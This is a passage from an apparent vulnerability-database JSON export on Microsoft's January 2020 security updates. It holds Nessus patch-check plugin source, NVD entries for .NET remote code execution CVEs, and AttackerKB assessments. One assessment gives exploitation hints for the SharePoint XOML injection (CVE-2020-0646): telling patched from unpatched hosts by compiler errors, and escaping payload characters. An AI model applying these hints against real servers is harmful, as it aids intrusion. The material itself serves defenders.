or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534271');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534271])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:42:02", "description": "The remote Windows host is missing security update 4534309 or cumulative update 4534297. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. 
(CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
(CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2020-08-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534297.NASL", "href": "https://www.tenable.com/plugins/nessus/132863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132863);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/07\");\n\n script_cve_id(\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\"\n );\n script_xref(name:\"MSKB\", value:\"4534297\");\n script_xref(name:\"MSKB\", value:\"4534309\");\n script_xref(name:\"MSFT\", value:\"MS20-4534297\");\n script_xref(name:\"MSFT\", value:\"MS20-4534309\");\n script_xref(name:\"IAVA\", value:\"2020-A-0026\");\n\n script_name(english:\"KB4534309: Windows 8.1 and Windows Server 2012 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534309\nor cumulative update 4534297. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. 
(CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534297/windows-8-1-kb4534297\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534309/windows-8-1-kb4534309\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534309 or Cumulative Update KB4534297.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534297', '4534309');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534297, 4534309])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:41:20", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka '.NET Framework Remote Code Execution 
Vulnerability'. This CVE ID is unique from CVE-2020-0605.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0606", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-01-17T03:03:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_core:3.0", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_core:3.1", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0606", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:41:19", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka '.NET Framework Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0606.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0605", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-01-21T21:22:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_core:3.0", "cpe:/a:microsoft:.net_core:1.0", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_core:3.1", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0605", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_core:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:42:03", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "type": "cve", "title": "CVE-2020-0646", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2022-01-01T20:03:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.6", "cpe:/a:microsoft:.net_framework:4.8", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7"], "id": "CVE-2020-0646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:15:31", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka \u2018.NET Framework Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0606.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at May 20, 2020 1:02pm UTC reported:\n\nA vulnerability exists in how Microsoft\u2019s XPS documents are processed using .NET that can be leveraged to execute code using a deserialization attack. XPS files are effectively ZIP archives containing multiple member, of which ones `.fdoc`, and `.fpage` can be used as triggers. While this vulnerability was patched in May of 2020, it\u2019s related to a similar vulnerability patched in January of 2020, which patched the same usage of the XPS document\u2019s `.fdseq` member file types.\n\nThe default XPS viewer in Windows **does not use .NET to render the XPS document making it unaffected by this vulnerability**. A vulnerable application would need to be configured to process a maliciously crafted XPS document. 
Due to this, it is unclear if in practice this vulnerability will require user interaction or authentication to leverage.\n\nSee: <https://www.mdsec.co.uk/2020/05/analysis-of-cve-2020-0605-code-execution-using-xps-files-in-net/>\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-0605", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-07-24T00:00:00", "id": "AKB:5635A082-A142-45A9-A677-DAB47F32BD83", "href": "https://attackerkb.com/topics/0QExVcmiG2/cve-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:28:13", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka \u2018.NET Framework Remote Code Execution Injection Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:31pm UTC reported:\n\nThe SharePoint WorkFlow 
component is affected by a vulnerability within .NET which can be abused to run arbitrary code when compiling XOML files. An authenticated user would need to issue an HTTP request with crafted XOML-formatted data (for which there are public examples). The vulnerability was patched for on-premises installations of SharePoint in January 2020.\n\nA correctly crafted XOML request will result in extra C# code being written to a temporary file on disk as part of the exploitation process. This is how an OS command is then executed.\n\nBoth patched and unpatched systems will return compiler error information in the XML response to the HTTP request. A patched system will have an error stating `\"Compilation failed. The type name: ... is not a valid language-independent type name.\"`. Malformed requests will include relevant information in the compiler error text, which is usually a character escaping issue. For best results escape all characters that are non-alphanumeric as unicode like `\\u####`.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 